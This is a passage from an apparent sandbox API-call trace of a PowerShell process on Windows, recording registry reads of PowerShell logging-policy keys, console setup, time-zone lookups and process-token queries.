lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x504 [0076.666] GetWindowThreadProcessId (in: hWnd=0x200e2, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc7c [0076.666] GetWindowThreadProcessId (in: hWnd=0x3008e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfec [0076.666] GetWindowThreadProcessId (in: hWnd=0x30202, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfd8 [0076.666] GetWindowThreadProcessId (in: hWnd=0x30114, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xfc0 [0076.666] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xcc8 [0076.666] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc84 [0076.666] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc8c [0076.666] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0xc44 [0076.667] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x9dc [0076.667] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.667] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x818 [0076.667] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x620 [0076.667] GetWindowThreadProcessId (in: hWnd=0x20032, lpdwProcessId=0x74e9a4 | out: lpdwProcessId=0x74e9a4) returned 0x7d4 [0076.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x58494c8, Length=0x20000, ResultLength=0x74ea78 | out: SystemInformation=0x58494c8, ResultLength=0x74ea78*=0x24d00) returned 0xc0000004 [0076.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x58694e8, Length=0x27500, ResultLength=0x74ea78 | out: SystemInformation=0x58694e8, ResultLength=0x74ea78*=0x1ad20) returned 0x0 [0076.901] WerSetFlags () returned 0x0 [0076.910] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0079.526] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x74ea90, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x74ea8c | out: pulNumLanguages=0x74ea90, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x74ea8c) returned 1 [0079.526] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x74ea90, pwszLanguagesBuffer=0x4881cc4, pcchLanguagesBuffer=0x74ea8c | out: pulNumLanguages=0x74ea90, pwszLanguagesBuffer=0x4881cc4, pcchLanguagesBuffer=0x74ea8c) returned 1 [0079.534] GetUserDefaultLocaleName (in: lpLocaleName=0x74ea24, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0079.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x74e1d4, nSize=0x80 | out: lpBuffer="￿￿tဢ狐㦀煹皴熲佚狙蹸箚ꩠ³皴熲㦀煹胰熝㦀煹胰熝t啾狙￿￿t꛰猦￿￿佚狙刐狙䪌熼") returned 0x0 [0079.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x74e1d4, nSize=0x80 | out: lpBuffer="￿￿랜¶tᩚ狦ㅈ±\x01⌀") returned 0x0 [0080.490] CoCreateGuid (in: pguid=0x74e144 | out: pguid=0x74e144*(Data1=0x458b93c5, Data2=0x78ce, Data3=0x491e, Data4=([0]=0xaf, [1]=0xa4, [2]=0xb7, [3]=0xf1, [4]=0xee, [5]=0x79, [6]=0x97, [7]=0x74))) returned 0x0 [0080.742] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0xe0357e50, Data2=0x544b, Data3=0x4144, Data4=([0]=0x82, [1]=0xef, [2]=0x64, [3]=0x90, [4]=0x86, [5]=0x5d, [6]=0x70, [7]=0x1d))) returned 0x0 [0080.742] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0x6dc35124, Data2=0x62d5, Data3=0x45b9, Data4=([0]=0x86, [1]=0xb4, [2]=0xb2, [3]=0xc0, [4]=0x24, [5]=0x40, [6]=0xbe, [7]=0x39))) returned 0x0 [0080.742] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0xce1d2124, Data2=0xa0af, Data3=0x48b9, Data4=([0]=0xab, [1]=0x72, [2]=0x75, [3]=0x7f, [4]=0x7a, [5]=0xbe, [6]=0x67, [7]=0xc7))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0xd3f3b65d, Data2=0xadd4, Data3=0x477f, Data4=([0]=0x8d, [1]=0x47, [2]=0xb9, [3]=0x98, [4]=0x7, [5]=0xe7, [6]=0xd1, [7]=0x2))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0xaa25bd22, Data2=0x3b9, Data3=0x491c, Data4=([0]=0xa4, [1]=0x6, [2]=0x3c, [3]=0x69, [4]=0xef, [5]=0xc4, [6]=0xb9, [7]=0x0))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0x21181e36, Data2=0xf3e1, Data3=0x4a86, Data4=([0]=0x97, [1]=0xb1, [2]=0x7f, [3]=0xd5, [4]=0x39, [5]=0xae, [6]=0x1f, [7]=0xd4))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0x106bbafc, Data2=0x8303, Data3=0x4d0b, Data4=([0]=0xa3, [1]=0xac, [2]=0x2c, [3]=0xdd, [4]=0xdc, [5]=0xbd, [6]=0x2c, [7]=0x5e))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0x3f55cedc, Data2=0x4845, Data3=0x4388, Data4=([0]=0x96, [1]=0x7c, [2]=0xfe, [3]=0xc2, [4]=0x35, [5]=0x2b, [6]=0xab, [7]=0x69))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0xf1e4a28, Data2=0x7eaa, Data3=0x49f4, Data4=([0]=0xab, [1]=0xf9, [2]=0xa8, [3]=0x22, [4]=0x9e, [5]=0x5a, [6]=0xfe, [7]=0x42))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0x6515a6c0, Data2=0xab6c, Data3=0x4773, Data4=([0]=0x9c, [1]=0xd2, [2]=0xc5, [3]=0xea, [4]=0xc3, [5]=0x30, [6]=0x43, [7]=0x6e))) returned 0x0 [0080.743] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0xdae67e04, Data2=0xe85a, Data3=0x4ccb, Data4=([0]=0x9a, [1]=0x11, [2]=0xd0, [3]=0x77, [4]=0x4b, [5]=0x6e, [6]=0x36, [7]=0x1a))) returned 0x0 [0080.744] CoCreateGuid (in: pguid=0x74e138 | out: pguid=0x74e138*(Data1=0xe1c00c01, Data2=0x9dcf, Data3=0x43c4, Data4=([0]=0xb6, [1]=0xb4, [2]=0x67, [3]=0x97, [4]=0x67, [5]=0xaf, [6]=0x64, [7]=0x7c))) returned 0x0 [0080.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x74de54, nSize=0xfa | out: lpBuffer="䳆狕賴箚\x14\x01徠狐哨ք") returned 0x0 [0080.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e9dc | out: phkResult=0x74e9dc*=0x3fc) returned 0x0 [0080.915] RegQueryValueExW (in: hKey=0x3fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e9fc, lpData=0x0, lpcbData=0x74e9f8*=0x0 | out: lpType=0x74e9fc*=0x1, lpData=0x0, lpcbData=0x74e9f8*=0x56) returned 0x0 [0080.915] RegQueryValueExW (in: hKey=0x3fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e9fc, lpData=0x4894660, lpcbData=0x74e9f8*=0x56 | out: lpType=0x74e9fc*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x74e9f8*=0x56) returned 0x0 [0080.915] RegCloseKey (hKey=0x3fc) returned 0x0 [0080.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x74e04c, nSize=0xfa | out: lpBuffer="䳆狕軼箚\x14\x01徠狐哨ք嬀狙\x01") returned 0x0 [0080.922] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e9ac | out: phkResult=0x74e9ac*=0x0) returned 0x2 [0080.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e9ac | out: phkResult=0x74e9ac*=0x0) returned 0x2 [0081.403] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0081.404] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0081.413] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e954 | out: phkResult=0x74e954*=0x288) returned 0x0 [0081.417] RegQueryValueExW (in: hKey=0x288, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e974, lpData=0x0, lpcbData=0x74e970*=0x0 | out: lpType=0x74e974*=0x1, lpData=0x0, lpcbData=0x74e970*=0x56) returned 0x0 [0081.417] RegQueryValueExW (in: hKey=0x288, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e974, lpData=0x489a8ac, lpcbData=0x74e970*=0x56 | out: lpType=0x74e974*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x74e970*=0x56) returned 0x0 [0081.417] RegCloseKey (hKey=0x288) returned 0x0 [0082.033] CoTaskMemAlloc (cb=0x20c) returned 0xba9e38 [0082.033] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xba9e38 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0082.284] CoTaskMemFree (pv=0xba9e38) [0082.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1e [0082.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x1e, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local", lpFilePart=0x0) returned 0x1d [0082.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0082.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x3b, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", lpFilePart=0x0) returned 0x3a [0082.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e9d4) returned 1 [0082.284] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell"), fInfoLevelId=0x0, lpFileInformation=0x74ea50 | out: lpFileInformation=0x74ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3ec8443, ftCreationTime.dwHighDateTime=0x1d327c2, ftLastAccessTime.dwLowDateTime=0xdc924418, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xdc924418, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0082.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e9d0) returned 1 [0082.290] CoCreateGuid (in: pguid=0x74ea60 | out: pguid=0x74ea60*(Data1=0xf23d79d2, Data2=0xf2b1, Data3=0x43ac, Data4=([0]=0x85, [1]=0x5c, [2]=0x3b, [3]=0x92, [4]=0xf1, [5]=0x40, [6]=0x24, [7]=0x83))) returned 0x0 [0082.294] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e940 | out: phkResult=0x74e940*=0x0) returned 0x2 [0082.295] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e940 | out: phkResult=0x74e940*=0x0) returned 0x2 [0082.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x74dfdc, nSize=0xfa | out: lpBuffer="䳆狕蹬箚\x14\x01徠狐哨ք䤀狕뎠箚") returned 0x0 [0082.313] CreateFileW (lpFileName="CONOUT$" (normalized: "\\device\\condrv\\currentout"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x628 [0082.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x628, lpConsoleScreenBufferInfo=0x74e9ec | out: lpConsoleScreenBufferInfo=0x74e9ec) returned 1 [0083.076] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x628, lpConsoleScreenBufferInfo=0x74e9ec | out: lpConsoleScreenBufferInfo=0x74e9ec) returned 1 [0083.474] GetConsoleMode (in: hConsoleHandle=0x628, lpMode=0x74ea50 | out: lpMode=0x74ea50) returned 1 [0083.924] SetConsoleMode (hConsoleHandle=0x628, dwMode=0x7) returned 1 [0084.433] GetConsoleMode (in: hConsoleHandle=0x628, lpMode=0x74ea50 | out: lpMode=0x74ea50) returned 1 [0084.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e9cc | out: phkResult=0x74e9cc*=0x0) returned 0x2 [0084.778] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e9cc | out: phkResult=0x74e9cc*=0x0) returned 0x2 [0084.779] GetConsoleCP () returned 0x1b5 [0085.101] GetCurrentConsoleFontEx (in: hConsoleOutput=0x628, bMaximumWindow=0, lpConsoleCurrentFontEx=0x74e9a0 | out: lpConsoleCurrentFontEx=0x74e9a0) returned 1 [0085.256] SetConsoleCtrlHandler (HandlerRoutine=0x4772ca6, Add=1) returned 1 [0085.305] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0085.306] GetFileType (hFile=0x90) returned 0x2 [0085.306] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x74ea6c | out: lpMode=0x74ea6c) returned 1 [0085.478] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8c [0085.478] GetFileType (hFile=0x8c) returned 0x2 [0085.478] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x74ea48 | out: lpMode=0x74ea48) returned 1 [0085.697] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x74e278*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x74e278*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0xd, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0085.703] CoCreateGuid (in: pguid=0x74e92c | out: pguid=0x74e92c*(Data1=0xba82bac5, Data2=0x8459, Data3=0x4046, Data4=([0]=0xb1, [1]=0x81, [2]=0x37, [3]=0xc1, [4]=0xf5, [5]=0xf5, [6]=0x10, [7]=0xca))) returned 0x0 [0085.712] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x74e95c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x74e95c*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0xd, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0085.719] EtwEventRegister (in: ProviderId=0x48bda90, EnableCallback=0x4772cce, CallbackContext=0x0, RegHandle=0x48bda6c | out: RegHandle=0x48bda6c) returned 0x0 [0085.719] EtwEventSetInformation (RegHandle=0x6fce0f0, InformationClass=0x4f, EventInformation=0x2, InformationLength=0x48bda40) returned 0x0 [0085.723] CoTaskMemAlloc (cb=0x20c) returned 0x705de28 [0085.723] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x705de28 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0085.723] CoTaskMemFree (pv=0x705de28) [0085.723] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0085.723] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0085.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x74dea8, nSize=0xfa | out: lpBuffer="䳆狕赘箚\x14\x01徠狐哨ք?ҋῴҌ￿￿ረ҄ㅈ±\x14\x01ሰ҄徠狐ᡲ狏Ȕ") returned 0x0 [0085.729] GetCurrentProcessId () returned 0xd2c [0085.731] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xd2c) returned 0x638 [0085.732] GetProcessTimes (in: hProcess=0x638, lpCreationTime=0x48be924, lpExitTime=0x48be92c, lpKernelTime=0x48be934, lpUserTime=0x48be93c | out: lpCreationTime=0x48be924, lpExitTime=0x48be92c, lpKernelTime=0x48be934, lpUserTime=0x48be93c) returned 1 [0085.732] CloseHandle (hObject=0x638) returned 1 [0085.734] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x74d704 | out: pTimeZoneInformation=0x74d704) returned 0x1 [0085.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x74d7e8 | out: phkResult=0x74d7e8*=0x638) returned 0x0 [0085.740] RegQueryValueExW (in: hKey=0x638, lpValueName="TZI", lpReserved=0x0, lpType=0x74d804, lpData=0x0, lpcbData=0x74d800*=0x0 | out: lpType=0x74d804*=0x3, lpData=0x0, lpcbData=0x74d800*=0x2c) returned 0x0 [0085.740] RegQueryValueExW (in: hKey=0x638, lpValueName="TZI", lpReserved=0x0, lpType=0x74d804, lpData=0x48bf340, lpcbData=0x74d800*=0x2c | out: lpType=0x74d804*=0x3, lpData=0x48bf340*, lpcbData=0x74d800*=0x2c) returned 0x0 [0085.741] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x74d63c | out: phkResult=0x74d63c*=0x0) returned 0x2 [0085.857] RegQueryValueExW (in: hKey=0x638, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x74d7dc, lpData=0x0, lpcbData=0x74d7d8*=0x0 | out: lpType=0x74d7dc*=0x1, lpData=0x0, lpcbData=0x74d7d8*=0x20) returned 0x0 [0085.857] RegQueryValueExW (in: hKey=0x638, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x74d7dc, lpData=0x48bf794, lpcbData=0x74d7d8*=0x20 | out: lpType=0x74d7dc*=0x1, lpData="@tzres.dll,-320", lpcbData=0x74d7d8*=0x20) returned 0x0 [0085.857] RegQueryValueExW (in: hKey=0x638, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x74d7dc, lpData=0x0, lpcbData=0x74d7d8*=0x0 | out: lpType=0x74d7dc*=0x1, lpData=0x0, lpcbData=0x74d7d8*=0x20) returned 0x0 [0085.857] RegQueryValueExW (in: hKey=0x638, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x74d7dc, lpData=0x48bf7ec, lpcbData=0x74d7d8*=0x20 | out: lpType=0x74d7dc*=0x1, lpData="@tzres.dll,-322", lpcbData=0x74d7d8*=0x20) returned 0x0 [0085.857] RegQueryValueExW (in: hKey=0x638, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x74d7dc, lpData=0x0, lpcbData=0x74d7d8*=0x0 | out: lpType=0x74d7dc*=0x1, lpData=0x0, lpcbData=0x74d7d8*=0x20) returned 0x0 [0085.857] RegQueryValueExW (in: hKey=0x638, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x74d7dc, lpData=0x48bf844, lpcbData=0x74d7d8*=0x20 | out: lpType=0x74d7dc*=0x1, lpData="@tzres.dll,-321", lpcbData=0x74d7d8*=0x20) returned 0x0 [0085.860] CoTaskMemAlloc (cb=0x20c) returned 0x705de28 [0085.860] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x705de28 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0085.860] CoTaskMemFree (pv=0x705de28) [0085.860] CoTaskMemAlloc (cb=0x20c) returned 0x705de28 [0085.860] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x74d7f8, pwszFileMUIPath=0x705de28, pcchFileMUIPath=0x74d7fc, pululEnumerator=0x74d7f0 | out: pwszLanguage=0x0, pcchLanguage=0x74d7f8, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x74d7fc, pululEnumerator=0x74d7f0) returned 1 [0085.864] CoTaskMemFree (pv=0x0) [0085.864] CoTaskMemFree (pv=0x705de28) [0085.865] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x70c0001 [0085.869] CoTaskMemAlloc (cb=0x3ec) returned 0x7091ae8 [0085.869] LoadStringW (in: hInstance=0x70c0001, uID=0x140, lpBuffer=0x7091ae8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0085.870] CoTaskMemFree (pv=0x7091ae8) [0085.870] FreeLibrary (hLibModule=0x70c0001) returned 1 [0085.871] CoTaskMemAlloc (cb=0x20c) returned 0x705de28 [0085.871] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x705de28 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0085.871] CoTaskMemFree (pv=0x705de28) [0085.871] CoTaskMemAlloc (cb=0x20c) returned 0x705de28 [0085.871] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x74d7f8, pwszFileMUIPath=0x705de28, pcchFileMUIPath=0x74d7fc, pululEnumerator=0x74d7f0 | out: pwszLanguage=0x0, pcchLanguage=0x74d7f8, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x74d7fc, pululEnumerator=0x74d7f0) returned 1 [0085.871] CoTaskMemFree (pv=0x0) [0085.871] CoTaskMemFree (pv=0x705de28) [0085.871] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x70c0001 [0085.872] CoTaskMemAlloc (cb=0x3ec) returned 0x7091ae8 [0085.872] LoadStringW (in: hInstance=0x70c0001, uID=0x142, lpBuffer=0x7091ae8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0085.872] CoTaskMemFree (pv=0x7091ae8) [0085.872] FreeLibrary (hLibModule=0x70c0001) returned 1 [0085.873] CoTaskMemAlloc (cb=0x20c) returned 0x705de28 [0085.873] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x705de28 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0085.873] CoTaskMemFree (pv=0x705de28) [0085.873] CoTaskMemAlloc (cb=0x20c) returned 0x705de28 [0085.873] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x74d7f8, pwszFileMUIPath=0x705de28, pcchFileMUIPath=0x74d7fc, pululEnumerator=0x74d7f0 | out: pwszLanguage=0x0, pcchLanguage=0x74d7f8, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x74d7fc, pululEnumerator=0x74d7f0) returned 1 [0085.874] CoTaskMemFree (pv=0x0) [0085.874] CoTaskMemFree (pv=0x705de28) [0085.874] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x70c0001 [0085.874] CoTaskMemAlloc (cb=0x3ec) returned 0x7091ae8 [0085.874] LoadStringW (in: hInstance=0x70c0001, uID=0x141, lpBuffer=0x7091ae8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0085.874] CoTaskMemFree (pv=0x7091ae8) [0085.874] FreeLibrary (hLibModule=0x70c0001) returned 1 [0085.875] RegCloseKey (hKey=0x638) returned 0x0 [0085.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x58694e8, Length=0x27500, ResultLength=0x74da18 | out: SystemInformation=0x58694e8, ResultLength=0x74da18*=0x1a8f0) returned 0x0 [0086.016] CreateWellKnownSid (in: WellKnownSidType=0x1a, DomainSid=0x0, pSid=0x48eb3a4, cbSid=0x74da48 | out: pSid=0x48eb3a4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), cbSid=0x74da48) returned 1 [0086.018] GetCurrentProcess () returned 0xffffffff [0086.018] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x74d9f4 | out: TokenHandle=0x74d9f4*=0x638) returned 1 [0086.018] GetTokenInformation (in: TokenHandle=0x638, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x74d9f8 | out: TokenInformation=0x0, ReturnLength=0x74d9f8) returned 0 [0086.018] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xb77bb0 [0086.019] GetTokenInformation (in: TokenHandle=0x638, TokenInformationClass=0x8, TokenInformation=0xb77bb0, TokenInformationLength=0x4, ReturnLength=0x74d9f8 | out: TokenInformation=0xb77bb0, ReturnLength=0x74d9f8) returned 1 [0086.019] LocalFree (hMem=0xb77bb0) returned 0x0 [0086.019] DuplicateTokenEx (in: hExistingToken=0x638, dwDesiredAccess=0x8, lpTokenAttributes=0x0, 